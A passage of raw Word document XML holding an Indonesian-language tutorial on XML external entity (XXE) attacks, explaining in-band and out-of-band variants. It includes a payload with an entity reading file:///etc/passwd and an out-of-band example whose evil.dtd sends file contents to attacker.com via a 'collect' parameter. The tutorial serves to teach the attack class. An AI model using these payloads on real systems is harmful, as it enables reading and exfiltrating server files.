          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">amanya </w:t>
      </w:r>
      <w:r w:rsidR="00D61FA1">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ROOT</w:t>
      </w:r>
      <w:r w:rsidR="00D61FA1">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> element.</w:t>
      </w:r>
      <w:r w:rsidR="00722CAE">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pada payload tersebut ‘root’ </w:t>
      </w:r>
      <w:r w:rsidR="004320AF">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00722CAE">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>dala</w:t>
      </w:r>
      <w:r w:rsidR="00E25DA7">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00722CAE">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> `ROOT` element saya.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C10207" w14:textId="676740EA" w:rsidR="000B2AC5" w:rsidRDefault="002D2A5A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 w:rsidRPr="006E4F9C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[&lt;!ENTITY read</w:t>
      </w:r>
      <w:r w:rsidR="000C3FA7" w:rsidRPr="006E4F9C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 xml:space="preserve"> SYSTEM</w:t>
      </w:r>
      <w:r w:rsidR="006E4F9C" w:rsidRPr="006E4F9C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 xml:space="preserve"> ‘file:///etc/passwd’&gt;]</w:t>
      </w:r>
      <w:r w:rsidR="00722CAE">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F32333C" w14:textId="1E04D797" w:rsidR="006E4F9C" w:rsidRDefault="006E4F9C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lastRenderedPageBreak/>
        <w:t>Di sini saya membuat suatu entity (semacam variable)</w:t>
      </w:r>
      <w:r w:rsidR="00B932C2">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> bernama `read`</w:t>
      </w:r>
      <w:r w:rsidR="00FB7FCC">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>, yang menggunakan command system untuk membaca konten dari /etc/passwd</w:t>
      </w:r>
      <w:r w:rsidR="00C80FC3">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193D2A9A" w14:textId="1B23936A" w:rsidR="00672985" w:rsidRDefault="004320AF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 w:rsidRPr="004320AF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&lt;/root&gt;&amp;read;&lt;/root&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDAFCAF" w14:textId="31AA340C" w:rsidR="004320AF" w:rsidRDefault="004320AF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>Root element selalu ada pada awal XML document, contohnya adalah seperti</w:t>
      </w:r>
      <w:r w:rsidR="00516EB0">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> ini </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3A7BF0" w14:textId="77777777" w:rsidR="00BA3C5B" w:rsidRPr="00BE083B" w:rsidRDefault="00BA3C5B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  <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE083B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&lt;note&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B16294" w14:textId="3531FEFD" w:rsidR="00BA3C5B" w:rsidRPr="00BE083B" w:rsidRDefault="00BA3C5B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  <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE083B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 xml:space="preserve">    &lt;to&gt;tom</w:t>
      </w:r>
      <w:r w:rsidR="00EB7BA4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my</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE083B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&lt;/to&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1FB10B" w14:textId="1AC04CA5" w:rsidR="00BA3C5B" w:rsidRPr="00BE083B" w:rsidRDefault="00BA3C5B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  <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE083B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 xml:space="preserve">    &lt;from&gt;danny&lt;/from&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D7AE56" w14:textId="6FD03E5F" w:rsidR="00BA3C5B" w:rsidRPr="00BE083B" w:rsidRDefault="00BA3C5B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  <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE083B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 xml:space="preserve">    &lt;heading&gt;testtest&lt;/heading&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6448140C" w14:textId="12CA8D46" w:rsidR="00BA3C5B" w:rsidRPr="00BE083B" w:rsidRDefault="00BA3C5B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  <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE083B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 xml:space="preserve">    &lt;body&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00865E27" w:rsidRPr="00BE083B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ini XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE083B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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699B755E" w14:textId="7E4725F9" w:rsidR="00BA3C5B" w:rsidRDefault="00BA3C5B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 w:rsidRPr="00BE083B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&lt;/note&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574F8239" w14:textId="0BB1CFC1" w:rsidR="000719B0" w:rsidRDefault="005D66C6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 xml:space="preserve">‘note’ di sini merupakan root element dari kode XML tersebut. </w:t>
      </w:r>
      <w:r w:rsidR="00F93E65">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Sisahnya adalah anak-anaknya. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Kembali pada payload tadi, di sini saya memanggil </w:t>
      </w:r>
      <w:r w:rsidR="007E774A">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">root element dan mengeksekusikan entity </w:t>
      </w:r>
      <w:r w:rsidR="00D0742B">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="007E774A">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r w:rsidR="00D0742B">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>’.</w:t>
      </w:r>
      <w:r w:rsidR="000719B0">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dengan begitu saja, kita sudah berhasil melakukan serangan XXE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7BE060" w14:textId="0E5BA4BC" w:rsidR="004E6FCD" w:rsidRDefault="004E6FCD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</w:p>
    <w:p w14:paraId="6CCB7C50" w14:textId="1F314C25" w:rsidR="004E6FCD" w:rsidRDefault="00D67B10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 xml:space="preserve">Selanjutnya adalah contoh serangan dari out-of-band XXE. </w:t>
      </w:r>
      <w:r w:rsidR="00786618">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Karena tidak ada media langsung untuk mempraktekkan out-of-band XXE, maka saya ambil contoh serangan dari acunetix.com</w:t>
      </w:r>
      <w:r w:rsidR="00822231">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0008135E">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tujuannya sama juga, yaitu untuk membaca konten dari /etc/paswd. </w:t>
      </w:r>
      <w:r w:rsidR="003E3EF0">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Berikut adalah </w:t>
      </w:r>
      <w:r w:rsidR="00EE05E4">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sebuah</w:t>
      </w:r>
      <w:r w:rsidR="003E3EF0">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> web request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6F2E95" w14:textId="2B70CEEF" w:rsidR="009B061A" w:rsidRDefault="009B061A" w:rsidP="000719B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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Fonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FCB6B7F" wp14:editId="02EEAF83">
            <wp:extent cx="3571615" cy="1924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406" cy="193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677D" w14:textId="44308A40" w:rsidR="009B061A" w:rsidRDefault="009B061A" w:rsidP="00E71D33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>Hampir mirip dengan serangan in-band XXE</w:t>
      </w:r>
      <w:r w:rsidR="004E1CFF">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">, pada payload ini kita membuat suatu entity bernama %file yang akan membuka file /etc/passwd. Namun dalam kasus ini, </w:t>
      </w:r>
      <w:r w:rsidR="00A42DD1">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>penyerang</w:t>
      </w:r>
      <w:r w:rsidR="004E1CFF">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> tidak akan mendapatkan isi dari /etc/passwd secara langsung. Maka dari itu, </w:t>
      </w:r>
      <w:r w:rsidR="002369F7">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">penyerang </w:t>
      </w:r>
      <w:r w:rsidR="004E1CFF">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">harus </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">menginclude file DTD dari webserver </w:t>
      </w:r>
      <w:r w:rsidR="0061113C">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">miliknya </w:t>
      </w:r>
      <w:r w:rsidR="00436B62">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00436B62" w:rsidRPr="007935BC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evil.dtd</w:t>
      </w:r>
      <w:r w:rsidR="00436B62">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007935BC">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Sebelum lanjut, perhatikan document XML tersebut memanggil </w:t>
      </w:r>
      <w:r w:rsidR="007935BC" w:rsidRPr="007935BC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send</w:t>
      </w:r>
      <w:r w:rsidR="007935BC">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">, padahal </w:t>
      </w:r>
      <w:r w:rsidR="007935BC" w:rsidRPr="007935BC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send</w:t>
      </w:r>
      <w:r w:rsidR="007935BC">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> tidak dideclare sama sekali dalam DTD XML document tersebut. Nah dari mana dia datang? </w:t>
      </w:r>
      <w:r w:rsidR="00E711A1">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Mari kita lihat konten dari </w:t>
      </w:r>
      <w:r w:rsidR="00E711A1" w:rsidRPr="00E711A1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evil.dtd</w:t>
      </w:r>
      <w:r w:rsidR="00E711A1">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> yang diinclude oleh penyerang.</w:t>
      </w:r>
      <w:r w:rsidR="004E1CFF">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D74125" w14:textId="5E5ACA90" w:rsidR="004E1CFF" w:rsidRDefault="00E711A1" w:rsidP="000719B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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Fonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C19F0D2" wp14:editId="4F6A5CC4">
            <wp:extent cx="3993226" cy="2088061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4219" w14:textId="1EE84403" w:rsidR="009B061A" w:rsidRDefault="00E7756A" w:rsidP="000719B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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 xml:space="preserve">Nah, sekarang kita tahu kalau </w:t>
      </w:r>
      <w:r w:rsidRPr="007935BC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send</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> datang dari </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF5222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evil.dtd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EF5222">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lalu bagaimana cara kerjanya? </w:t>
      </w:r>
      <w:r w:rsidR="002702E0">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Pertama</w:t>
      </w:r>
      <w:r w:rsidR="002A097F">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">-tama XML parser </w:t>
      </w:r>
      <w:r w:rsidR="00832582">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>akan memproses %file yang akan meload /etc/passwd</w:t>
      </w:r>
      <w:r w:rsidR="00B85CC4">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> tetapi </w:t>
      </w:r>
      <w:r w:rsidR="00631EED">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ingat, belum dieksekusi, baru dibuat variablenya</w:t>
      </w:r>
      <w:r w:rsidR="00832582">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00C90A14">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Lalu, </w:t>
      </w:r>
      <w:r w:rsidR="00A865C0">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">XML parser </w:t>
      </w:r>
      <w:r w:rsidR="00C90A14">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="002A097F">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">embuat request ke pada attacker.com merequest </w:t>
      </w:r>
      <w:r w:rsidR="002A097F" w:rsidRPr="002A097F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evil.dtd</w:t>
      </w:r>
      <w:r w:rsidR="002A097F">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">. XML parser lalu memproses </w:t>
      </w:r>
      <w:r w:rsidR="002A097F" w:rsidRPr="002A097F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evil.dtd</w:t>
      </w:r>
      <w:r w:rsidR="002A097F">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> tersebut. </w:t>
      </w:r>
      <w:r w:rsidR="003144D4">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Di dalam </w:t>
      </w:r>
      <w:r w:rsidR="003144D4" w:rsidRPr="003144D4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evil.dtd</w:t>
      </w:r>
      <w:r w:rsidR="003144D4">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00374018">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="002A097F">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ntity </w:t>
      </w:r>
      <w:r w:rsidR="002A097F" w:rsidRPr="002A097F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%all</w:t>
      </w:r>
      <w:r w:rsidR="002A097F">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> membuat entity </w:t>
      </w:r>
      <w:r w:rsidR="002A097F" w:rsidRPr="002A097F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send</w:t>
      </w:r>
      <w:r w:rsidR="002A097F">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> yang akan menjalankan </w:t>
      </w:r>
      <w:r w:rsidR="002A097F" w:rsidRPr="002A097F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SYSTEM 'http://attacker.com/?collect=%file;'</w:t>
      </w:r>
      <w:r w:rsidR="00B51E05">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009F0698">
        <w:rPr>
